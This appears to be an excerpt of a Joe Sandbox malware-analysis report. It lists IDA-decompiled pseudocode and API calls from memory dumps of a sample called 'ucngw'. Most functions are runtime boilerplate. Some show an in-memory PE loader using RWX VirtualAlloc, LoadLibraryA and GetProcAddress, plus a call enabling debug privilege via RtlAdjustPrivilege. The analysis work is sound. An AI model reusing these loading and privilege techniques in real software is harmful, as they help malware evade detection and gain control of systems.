    						}
    						_t80 = _t80 + 1;
    						_t51 = _t51 + 0x30;
    						_v32 = _t80;
    						__eflags = _t51 - 0xf0;
    						if(_t51 < 0xf0) {
    							continue;
    						} else {
    							__eflags = _t77 - 0xfde8;
    							if(_t77 == 0xfde8) {
    								L23:
    							} else {
    								__eflags = _t77 - 0xfde9;
    								if(_t77 == 0xfde9) {
    									goto L23;
    								} else {
    									_t51 = IsValidCodePage(_t77 & 0x0000ffff);
    									__eflags = _t51;
    									if(_t51 == 0) {
    										goto L23;
    									} else {
    										_t51 = GetCPInfo(_t77,  &_v28);
    										__eflags = _t51;
    										if(_t51 == 0) {
    											__eflags =  *0xc6b394 - _t93; // 0x0
    											if(__eflags == 0) {
    												goto L23;
    											} else {
    												E00C58A2A(_t96);
    												goto L37;
    											}
    										} else {
    											E00C53610(_t93, _t96 + 0x18, _t93, 0x101);
    											 *(_t96 + 4) = _t77;
    											 *(_t96 + 0x21c) = _t93;
    											_t77 = 1;
    											__eflags = _v28 - 1;
    											if(_v28 <= 1) {
    												 *(_t96 + 8) = _t93;
    											} else {
    												__eflags = _v22;
    												_t72 =  &_v22;
    												if(_v22 != 0) {
    													while(1) {
    														_t87 = _t72[1];
    														__eflags = _t87;
    														if(_t87 == 0) {
    															goto L16;
    														}
    														_t90 = _t87 & 0x000000ff;
    														_t88 =  *_t72 & 0x000000ff;
    														while(1) {
    															__eflags = _t88 - _t90;
    															if(_t88 > _t90) {
    																break;
    															}
    															 *(_t96 + _t88 + 0x19) =  *(_t96 + _t88 + 0x19) | 0x00000004;
    															_t88 = _t88 + 1;
    															__eflags = _t88;
    														}
    														_t72 =  &(_t72[2]);
    														__eflags =  *_t72;
    														if( *_t72 != 0) {
    															continue;
    														}
    														goto L16;
    													}
    												}
    												L16:
    												_t73 = _t96 + 0x1a;
    												_t86 = 0xfe;
    												do {
    													 *_t73 =  *_t73 | 0x00000008;
    													_t73 =  &(_t73[1]);
    													_t86 = _t86 - 1;
    													__eflags = _t86;
    												} while (_t86 != 0);
    												 *(_t96 + 0x21c) = E00C58979( *(_t96 + 4));
    												 *(_t96 + 8) = _t77;
    											}
    											asm("stosd");
    											asm("stosd");
    											asm("stosd");
    											L36:
    											E00C58A8F(_t90, _t96); // executed
    											L37:
    											__eflags = 0;
    										}
    									}
    								}
    							}
    						}
    						_pop(_t92);
    						goto L39;
    					}
    					E00C53610(_t93, _t96 + 0x18, _t93, 0x101);
    					_t54 = _v32 * 0x30;
    					__eflags = _t54;
    					_v36 = _t54;
    					_t55 = _t54 + 0xc6a308;
    					_v32 = _t55;
    					do {
    						__eflags =  *_t55;
    						_t81 = _t55;
    						if( *_t55 != 0) {
    							while(1) {
    								_t62 = _t81[1];
    								__eflags = _t62;
    								if(_t62 == 0) {
    									break;
    								}
    								_t91 =  *_t81 & 0x000000ff;
    								_t63 = _t62 & 0x000000ff;
    								while(1) {
    									__eflags = _t91 - _t63;
    									if(_t91 > _t63) {
    										break;
    									}
    									__eflags = _t91 - 0x100;
    									if(_t91 < 0x100) {
    										_t31 = _t93 + 0xc6a2f4; // 0x8040201
    										 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) |  *_t31;
    										_t91 = _t91 + 1;
    										__eflags = _t91;
    										_t63 = _t81[1] & 0x000000ff;
    										continue;
    									}
    									break;
    								}
    								_t81 =  &(_t81[2]);
    								__eflags =  *_t81;
    								if( *_t81 != 0) {
    									continue;
    								}
    								break;
    							}
    							_t55 = _v32;
    						}
    						_t93 = _t93 + 1;
    						_t55 = _t55 + 8;
    						_v32 = _t55;
    						__eflags = _t93 - 4;
    					} while (_t93 < 4);
    					 *(_t96 + 4) = _t77;
    					 *(_t96 + 8) = 1;
    					 *(_t96 + 0x21c) = E00C58979(_t77);
    					_t82 = _t96 + 0xc;
    					_t90 = _v36 + 0xc6a2fc;
    					_t94 = 6;
    					do {
    						_t58 =  *_t90;
    						_t90 = _t90 + 2;
    						 *_t82 = _t58;
    						_t82 = _t82 + 2;
    						_t94 = _t94 - 1;
    						__eflags = _t94;
    					} while (_t94 != 0);
    					goto L36;
    				} else {
    					E00C58A2A(_t96);
    				}
    				L39:
    				return E00C51252(_t77, _v8 ^ _t97, _t92, _t96);
    			}

    APIs
      • Part of subcall function 00C589B7: GetOEMCP.KERNEL32(00000000), ref: 00C589E2
      • Part of subcall function 00C589B7: GetACP.KERNEL32(00000000), ref: 00C589F9
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00C58C85,?,00000000), ref: 00C58E58
    • GetCPInfo.KERNEL32(00000000,00C58C85,?,?,?,00C58C85,?,00000000), ref: 00C58E6B
      • Part of subcall function 00C58A8F: GetCPInfo.KERNEL32(?,?), ref: 00C58AB4
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 92%
    			E1000978C(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				signed int _v8;
    				char _v22;
    				struct _cpinfo _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t48;
    				int _t51;
    				signed int _t54;
    				signed int _t55;
    				short _t58;
    				signed char _t62;
    				signed int _t63;
    				signed char* _t72;
    				signed char* _t73;
    				int _t78;
    				signed int _t81;
    				signed char* _t82;
    				short* _t83;
    				int _t87;
    				signed char _t88;
    				signed int _t89;
    				signed int _t91;
    				signed int _t92;
    				int _t94;
    				int _t95;
    				intOrPtr _t98;
    				signed int _t99;
    
    				_t48 =  *0x1001d018; // 0x26c1db24
    				_v8 = _t48 ^ _t99;
    				_t98 = _a8;
    				_t78 = E1000935F(__eflags, _a4);
    				if(_t78 != 0) {
    					_t94 = 0;
    					__eflags = 0;
    					_t81 = 0;
    					_t51 = 0;
    					_v32 = 0;
    					while(1) {
    						__eflags =  *((intOrPtr*)(_t51 + 0x1001d200)) - _t78;
    						if( *((intOrPtr*)(_t51 + 0x1001d200)) == _t78) {
    							break;
    						}
    						_t81 = _t81 + 1;
    						_t51 = _t51 + 0x30;
    						_v32 = _t81;
    						__eflags = _t51 - 0xf0;
    						if(_t51 < 0xf0) {
    							continue;
    						} else {
    							__eflags = _t78 - 0xfde8;
    							if(_t78 == 0xfde8) {
    								L23:
    							} else {
    								__eflags = _t78 - 0xfde9;
    								if(_t78 == 0xfde9) {
    									goto L23;
    								} else {
    									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
    									__eflags = _t51;
    									if(_t51 == 0) {
    										goto L23;
    									} else {
    										_t51 = GetCPInfo(_t78,  &_v28);
    										__eflags = _t51;
    										if(_t51 == 0) {
    											__eflags =  *0x1001f1cc - _t94; // 0x0
    											if(__eflags == 0) {
    												goto L23;
    											} else {
    												E100093D2(_t98);
    												goto L37;
    											}
    										} else {
    											E10001E90(_t94, _t98 + 0x18, _t94, 0x101);
    											 *(_t98 + 4) = _t78;
    											 *(_t98 + 0x21c) = _t94;
    											_t78 = 1;
    											__eflags = _v28 - 1;
    											if(_v28 <= 1) {
    												 *(_t98 + 8) = _t94;
    											} else {
    												__eflags = _v22;
    												_t72 =  &_v22;
    												if(_v22 != 0) {
    													while(1) {
    														_t88 = _t72[1];
    														__eflags = _t88;
    														if(_t88 == 0) {
    															goto L16;
    														}
    														_t91 = _t88 & 0x000000ff;
    														_t89 =  *_t72 & 0x000000ff;
    														while(1) {
    															__eflags = _t89 - _t91;
    															if(_t89 > _t91) {
    																break;
    															}
    															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
    															_t89 = _t89 + 1;
    															__eflags = _t89;
    														}
    														_t72 =  &(_t72[2]);
    														__eflags =  *_t72;
    														if( *_t72 != 0) {
    															continue;
    														}
    														goto L16;
    													}
    												}
    												L16:
    												_t73 = _t98 + 0x1a;
    												_t87 = 0xfe;
    												do {
    													 *_t73 =  *_t73 | 0x00000008;
    													_t73 =  &(_t73[1]);
    													_t87 = _t87 - 1;
    													__eflags = _t87;
    												} while (_t87 != 0);
    												 *(_t98 + 0x21c) = E10009321( *(_t98 + 4));
    												 *(_t98 + 8) = _t78;
    											}
    											_t95 = _t98 + 0xc;
    											asm("stosd");
    											asm("stosd");
    											asm("stosd");
    											L36:
    											E10009437(_t78, _t91, _t95, _t98, _t98); // executed
    											L37:
    											__eflags = 0;
    										}
    									}
    								}
    							}
    						}
    						goto L39;
    					}
    					E10001E90(_t94, _t98 + 0x18, _t94, 0x101);
    					_t54 = _v32 * 0x30;
    					__eflags = _t54;
    					_v36 = _t54;
    					_t55 = _t54 + 0x1001d210;
    					_v32 = _t55;
    					do {
    						__eflags =  *_t55;
    						_t82 = _t55;
    						if( *_t55 != 0) {
    							while(1) {
    								_t62 = _t82[1];
    								__eflags = _t62;
    								if(_t62 == 0) {
    									break;
    								}
    								_t92 =  *_t82 & 0x000000ff;
    								_t63 = _t62 & 0x000000ff;
    								while(1) {
    									__eflags = _t92 - _t63;
    									if(_t92 > _t63) {
    										break;
    									}
    									__eflags = _t92 - 0x100;
    									if(_t92 < 0x100) {
    										_t31 = _t94 + 0x1001d1f8; // 0x8040201
    										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
    										_t92 = _t92 + 1;
    										__eflags = _t92;
    										_t63 = _t82[1] & 0x000000ff;
    										continue;
    									}
    									break;
    								}
    								_t82 =  &(_t82[2]);
    								__eflags =  *_t82;
    								if( *_t82 != 0) {
    									continue;
    								}
    								break;
    							}
    							_t55 = _v32;
    						}
    						_t94 = _t94 + 1;
    						_t55 = _t55 + 8;
    						_v32 = _t55;
    						__eflags = _t94 - 4;
    					} while (_t94 < 4);
    					 *(_t98 + 4) = _t78;
    					 *(_t98 + 8) = 1;
    					 *(_t98 + 0x21c) = E10009321(_t78);
    					_t83 = _t98 + 0xc;
    					_t91 = _v36 + 0x1001d204;
    					_t95 = 6;
    					do {
    						_t58 =  *_t91;
    						_t91 = _t91 + 2;
    						 *_t83 = _t58;
    						_t83 = _t83 + 2;
    						_t95 = _t95 - 1;
    						__eflags = _t95;
    					} while (_t95 != 0);
    					goto L36;
    				} else {
    					E100093D2(_t98);
    				}
    				L39:
    				return E10001B26(_v8 ^ _t99);
    			}

    APIs
      • Part of subcall function 1000935F: GetOEMCP.KERNEL32(00000000,?,?,100095E8,?), ref: 1000938A
      • Part of subcall function 1000935F: GetACP.KERNEL32(00000000,?,?,100095E8,?), ref: 100093A1
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,1000962D,?,00000000), ref: 10009800
    • GetCPInfo.KERNEL32(00000000,1000962D,?,?,?,1000962D,?,00000000), ref: 10009813
      • Part of subcall function 10009437: GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 1000945C
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 76%
    			E00C60520(void* __edx, intOrPtr* _a8) {
    				intOrPtr _v8;
    				signed int _v12;
    				char _v20;
    				intOrPtr _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v68;
    				intOrPtr _v196;
    				char _v380;
    				intOrPtr _v384;
    				intOrPtr* _v388;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t45;
    				signed int _t46;
    				void* _t48;
    				void* _t49;
    				void* _t54;
    				void* _t57;
    				intOrPtr _t58;
    				void* _t69;
    				void* _t70;
    				char* _t72;
    				void* _t85;
    				intOrPtr* _t87;
    				void* _t88;
    				signed int _t89;
    				void* _t90;
    				intOrPtr _t91;
    				void* _t92;
    
    				_push(0xfffffffe);
    				_push(0xc69078);
    				_push(E00C53330);
    				_push( *[fs:0x0]);
    				_t91 = _t90 - 0x174;
    				_t45 =  *0xc6a004; // 0x26d30358
    				_v12 = _v12 ^ _t45;
    				_t46 = _t45 ^ _t89;
    				_v32 = _t46;
    				_push(_t46);
    				 *[fs:0x0] =  &_v20;
    				_v28 = _t91;
    				_t69 = __edx;
    				_t87 = _a8;
    				_v388 = _t87;
    				_v384 = 0;
    				_v68 = 0;
    				_v48 = 0;
    				_v40 = 0;
    				_v44 = 0;
    				_v36 = 0;
    				_v8 = 0;
    				_v8 = 1;
    				_t48 = E00C60D90( &_v380, __edx);
    				_t92 = _t91 + 4;
    				if(_t48 == 0) {
    					_t72 =  &_v380;
    					_t49 = E00C60CD0(_t72); // executed
    					if(_t49 != 0) {
    						goto L1;
    					} else {
    						_v8 = 2;
    						_push(_t72);
    						_t54 = E00C60BB0( &_v380, _t69);
    						_t92 = _t92 + 8;
    						if(_t54 != 0 || E00C60A70( &_v380) != 0 || E00C608F0( &_v380) != 0) {
    							goto L1;
    						} else {
    							_t57 = E00C60830( &_v380); // executed
    							if(_t57 != 0) {
    								goto L1;
    							} else {
    								_t58 = E00C60790( &_v380); // executed
    								if(_t58 != 0) {
    									goto L1;
    								} else {
    									if(_t87 != 0) {
    										_v8 = 3;
    										 *_t87 = 0x20;
    										 *((intOrPtr*)(_t87 + 4)) = _t58;
    										 *((intOrPtr*)(_t87 + 8)) = _v56;
    										 *((intOrPtr*)(_t87 + 0xc)) = _v52;
    										 *((intOrPtr*)(_t87 + 0x10)) = _v36;
    										 *((intOrPtr*)(_t87 + 0x14)) = _v196;
    										 *((intOrPtr*)(_t87 + 0x18)) = _v48;
    										 *((intOrPtr*)(_t87 + 0x1c)) = _v44;
    										_v8 = 2;
    									}
    									_v384 = 1;
    									E00C53CC0(_t89, 0xc6a004,  &_v20, 0xfffffffe);
    								}
    							}
    						}
    					}
    				} else {
    					L1:
    					E00C53CC0(_t89, 0xc6a004,  &_v20, 0xfffffffe);
    				}
    				 *[fs:0x0] = _v20;
    				_pop(_t85);
    				_pop(_t88);
    				_pop(_t70);
    				return E00C51252(_t70, _v32 ^ _t89, _t85, _t88);
    			}

    APIs
      • Part of subcall function 00C60CD0: VirtualAlloc.KERNELBASE(?,00000000,00003000,00000040,00000000,00C60478,?,?,?,00C605D9), ref: 00C60D26
      • Part of subcall function 00C60CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00C605D9), ref: 00C60D5B
      • Part of subcall function 00C608F0: LoadLibraryA.KERNEL32(?), ref: 00C60939
      • Part of subcall function 00C608F0: GetProcAddress.KERNEL32(?,?,?,?,00C60618), ref: 00C60A06
      • Part of subcall function 00C60830: VirtualProtect.KERNELBASE(?,000000FE,00000040,00C60629,00000000,00C60478,?,?,?,00C60629), ref: 00C608A4
    • @_EH4_CallFilterFunc@8.NTDLLP ref: 00C6069B
    • @_EH4_CallFilterFunc@8.NTDLLP ref: 00C605BF
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 75%
    			E100111D0(void* __eflags) {
    				char _v12;
    				intOrPtr _v20;
    				char _v24;
    				void* _t7;
    				intOrPtr* _t9;
    				void* _t17;
    				intOrPtr* _t20;
    
    				E10011140(__eflags);
    				 *0x1001f2e0 = 0xff;
    				 *0x1001f2dc = 0;
    				_t7 = LocalAlloc(0x40, 0x1fe);
    				 *0x1001f2d8 = _t7;
    				_t26 = _t7;
    				if(_t7 != 0) {
    					RtlAdjustPrivilege(0x14, 1, 0,  &_v12); // executed
    					_v24 = 0x1001a7a0;
    					_v20 = 7;
    					E100120C0( &_v24, _t26);
    				}
    				_t20 = 0x1001a6e0;
    				_t17 = 2;
    				do {
    					_t9 =  *((intOrPtr*)( *_t20 + 0x18));
    					if(_t9 != 0) {
    						 *_t9();
    					}
    					_t20 = _t20 + 4;
    					_t17 = _t17 - 1;
    				} while (_t17 != 0);
    				return 0;
    			}

    APIs
      • Part of subcall function 10011140: RtlGetNtVersionNumbers.NTDLL(1001F384,1001F3CC,1001F388), ref: 10011156
    • LocalAlloc.KERNEL32(00000040,000001FE), ref: 100111FB
    • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 10011215
      • Part of subcall function 100120C0: LocalAlloc.KERNEL32(00000040,1001A89C), ref: 100121E0
      • Part of subcall function 100120C0: LocalAlloc.KERNEL32(00000040,?), ref: 1001231C
      • Part of subcall function 100120C0: LocalAlloc.KERNEL32(00000040,?), ref: 1001239F
      • Part of subcall function 100120C0: LocalAlloc.KERNEL32(00000040,?), ref: 10012425
      • Part of subcall function 100120C0: LocalAlloc.KERNEL32(00000040,?), ref: 100124C0
      • Part of subcall function 100120C0: LocalFree.KERNEL32(00000000,?,?), ref: 100124FF
      • Part of subcall function 100120C0: LocalFree.KERNEL32(00000000,?,?), ref: 10012511
      • Part of subcall function 100120C0: LocalFree.KERNEL32(00000000,?,?), ref: 10012526
      • Part of subcall function 100120C0: LocalFree.KERNEL32(?,?,?), ref: 10012538
      • Part of subcall function 100120C0: LocalFree.KERNEL32(?), ref: 10012556
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 100%
    			E00C59025(void* __ecx) {
    				void* _t6;
    				void* _t14;
    				void* _t18;
    				WCHAR* _t19;
    
    				_t14 = __ecx;
    				_t19 = GetEnvironmentStringsW();
    				if(_t19 != 0) {
    					_t12 = (E00C58FEE(_t19) - _t19 >> 1) + (E00C58FEE(_t19) - _t19 >> 1);
    					_t6 = E00C561AB(_t14, (E00C58FEE(_t19) - _t19 >> 1) + (E00C58FEE(_t19) - _t19 >> 1)); // executed
    					_t18 = _t6;
    					if(_t18 != 0) {
    						E00C5DF30(_t18, _t19, _t12);
    					}
    					E00C56171(0);
    					FreeEnvironmentStringsW(_t19);
    				} else {
    					_t18 = 0;
    				}
    				return _t18;
    			}

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 00C59029
      • Part of subcall function 00C561AB: RtlAllocateHeap.NTDLL(00000000,00C51FCA,?,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA,?,?,?,?), ref: 00C561DD
      • Part of subcall function 00C56171: HeapFree.KERNEL32(00000000,00000000), ref: 00C56187
      • Part of subcall function 00C56171: GetLastError.KERNEL32(?,?,00C59953,?,00000000,?,00000000,?,00C5997A,?,00000007,?,?,00C59DDC,?,?), ref: 00C56199
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C59069
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 100%
    			E00C619C0(long __ecx, void** __edx) {
    				void* _t4;
    				void* _t8;
    				void** _t9;
    
    				_t8 = __ecx;
    				_t9 = __edx;
    				if(__ecx == 0 || __edx == 0) {
    					L4:
    					return 0;
    				} else {
    					_t4 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
    					if(_t4 == 0) {
    						goto L4;
    					} else {
    						_t9[1] = _t8;
    						 *_t9 = _t4;
    						return 1;
    					}
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00C61C58), ref: 00C619D1
    • RtlAllocateHeap.NTDLL(00000000), ref: 00C619D8
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 96%
    			E00C60CD0(intOrPtr __ecx) {
    				intOrPtr _v8;
    				signed int _t16;
    				void* _t19;
    				void* _t22;
    				intOrPtr _t25;
    				intOrPtr _t28;
    				signed int _t31;
    				intOrPtr _t33;
    				intOrPtr* _t36;
    				intOrPtr _t38;
    				void* _t40;
    				void* _t44;
    				long _t45;
    
    				_push(__ecx);
    				_t28 = __ecx;
    				_t40 = 0;
    				_v8 = __ecx;
    				_t16 =  *(__ecx + 0x46) & 0x0000ffff;
    				_t44 = 0;
    				_t33 =  *((intOrPtr*)(__ecx + 0x138));
    				if(0 < _t16) {
    					_t36 = _t33 + 0xc;
    					_t31 = _t16;
    					do {
    						_t38 =  *((intOrPtr*)(_t36 - 4));
    						if(_t38 != 0) {
    							_t25 =  *_t36;
    							_t40 =  <  ? _t25 : _t40;
    							_t44 =  >  ? _t25 + _t38 : _t44;
    						}
    						_t36 = _t36 + 0x28;
    						_t31 = _t31 - 1;
    					} while (_t31 != 0);
    					_t28 = _v8;
    				}
    				_t6 = _t28 + 0x74; // 0x6c70000
    				_t45 = _t44 - _t40;
    				_t19 = VirtualAlloc( *_t6 + _t40, _t45, 0x3000, 0x40);
    				_t7 = _t28 + 0x74; // 0x6c70000
    				 *(_t28 + 0x148) = _t19;
    				 *((intOrPtr*)(_t28 + 0x144)) =  *_t7;
    				if(_t19 != 0) {
    					L10:
    					_t21 =  ==  ? 3 : 0;
    					return  ==  ? 3 : 0;
    				} else {
    					if(( *(_t28 + 0x56) & 0x00000001) == 0) {
    						_t22 = VirtualAlloc(0, _t45, 0x3000, 0x40);
    						 *(_t28 + 0x148) = _t22;
    						 *((intOrPtr*)(_t28 + 0x144)) = _t22 - _t40;
    						goto L10;
    					} else {
    						return 4;
    					}
    				}
    			}

    APIs
    • VirtualAlloc.KERNELBASE(?,00000000,00003000,00000040,00000000,00C60478,?,?,?,00C605D9), ref: 00C60D26
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00C605D9), ref: 00C60D5B
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 72%
    			E00C51359(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, void* __esi) {
    				void* _t10;
    				intOrPtr _t12;
    				void* _t20;
    				void* _t27;
    				void* _t29;
    				void* _t31;
    				char _t35;
    				void* _t36;
    				intOrPtr* _t40;
    				void* _t44;
    				intOrPtr* _t51;
    				intOrPtr* _t52;
    				void* _t53;
    				intOrPtr* _t54;
    				void* _t55;
    
    				_t48 = __edi;
    				_t47 = __edx;
    				_t36 = __ecx;
    				E00C51CA0(__ebx, __edi, __esi, 0xc689e8, 0x14);
    				_t10 = E00C51750(_t36, __edx, 1); // executed
    				if(_t10 != 0) {
    					L2:
    					_t35 = 0;
    					 *((char*)(_t55 - 0x19)) = 0;
    					 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
    					 *((char*)(_t55 - 0x24)) = E00C5171B();
    					_t12 =  *0xc6acc4; // 0x2
    					if(_t12 == 1) {
    						goto L1;
    					}
    					if(_t12 != 0) {
    						_t35 = 1;
    						 *((char*)(_t55 - 0x19)) = 1;
    						L8:
    						E00C518AA( *((intOrPtr*)(_t55 - 0x24)));
    						_pop(_t40);
    						_t51 = E00C51A48();
    						if( *_t51 != 0) {
    							_t29 = E00C51820(_t35, 0, _t51);
    							_t40 = _t51;
    							if(_t29 != 0) {
    								_t54 =  *_t51;
    								_t40 = _t54;
    								L00C51C94();
    								 *_t54(0, 2, 0);
    							}
    						}
    						_t52 = E00C51A4E();
    						if( *_t52 != 0) {
    							_t27 = E00C51820(_t35, 0, _t52);
    							_t40 = _t52;
    							if(_t27 != 0) {
    								E00C559D9(_t35, _t47, 0, _t52,  *_t52);
    								_pop(_t40);
    							}
    						}
    						_push(E00C51B6F() & 0x0000ffff);
    						_push(E00C556D8());
    						_push(0);
    						_push(0xc50000); // executed
    						_t20 = E00C61EC0(); // executed
    						_t53 = _t20;
    						if(E00C51BA5() == 0) {
    							E00C55A11(_t53); // executed
    						}
    						if(_t35 == 0) {
    							E00C559B4();
    						}
    						E00C518C7(_t40, 1, 0);
    						 *(_t55 - 4) = 0xfffffffe;
    						L19:
    						return E00C51CE6();
    					}
    					 *0xc6acc4 = 1;
    					_t31 = E00C5577A(1, 0xc63158, 0xc63170); // executed
    					_pop(_t44);
    					if(_t31 == 0) {
    						E00C5571E(_t44, 0xc6314c, 0xc63154); // executed
    						 *0xc6acc4 = 2;
    						goto L8;
    					} else {
    						 *(_t55 - 4) = 0xfffffffe;
    						goto L19;
    					}
    				}
    				L1:
    				E00C51A54(_t47, _t48, 7);
    				goto L2;
    			}

    APIs
      • Part of subcall function 00C51A54: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C51A61
      • Part of subcall function 00C51A54: IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 00C51B29
      • Part of subcall function 00C51A54: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C51B48
      • Part of subcall function 00C51A54: UnhandledExceptionFilter.KERNEL32(?), ref: 00C51B52
    • ___scrt_get_show_window_mode.LIBCMT ref: 00C51435
      • Part of subcall function 00C51B6F: GetStartupInfoW.KERNEL32(?), ref: 00C51B89
      • Part of subcall function 00C61EC0: GetCommandLineW.KERNEL32 ref: 00C61EDF
      • Part of subcall function 00C61EC0: CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00C61EF3
      • Part of subcall function 00C61EC0: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00C62036
      • Part of subcall function 00C61EC0: WriteFile.KERNEL32(00000000,<NULL>,?,?,00000000), ref: 00C62074
      • Part of subcall function 00C61EC0: CloseHandle.KERNEL32(00000000), ref: 00C6207B
      • Part of subcall function 00C51BA5: GetModuleHandleW.KERNEL32(00000000,00C557EA,00C68D08,0000000C,00C559D4,00000003,00000002,00000000,?,00C5623B,00000003,00C58023), ref: 00C51BA7
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 88%
    			E00C53EA6(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				struct HINSTANCE__* _t13;
    				signed int* _t20;
    				signed int _t28;
    				signed int _t29;
    				signed int _t30;
    				signed int _t34;
    				intOrPtr* _t35;
    
    				_t20 = 0xc6ad64 + _a4 * 4;
    				asm("lock cmpxchg [ebx], ecx");
    				_t28 =  *0xc6a004; // 0x26d30358
    				_t30 = _t29 | 0xffffffff;
    				_t34 = _t28 ^ 0;
    				asm("ror esi, cl");
    				if(_t34 == _t30) {
    					L14:
    					return 0;
    				}
    				if(_t34 == 0) {
    					_t35 = _a12;
    					if(_t35 == _a16) {
    						L7:
    						_t13 = 0;
    						L8:
    						if(_t13 == 0) {
    							L13:
    							_push(0x20);
    							asm("ror edi, cl");
    							 *_t20 = _t30 ^ _t28;
    							goto L14;
    						}
    						_t34 = GetProcAddress(_t13, _a8);
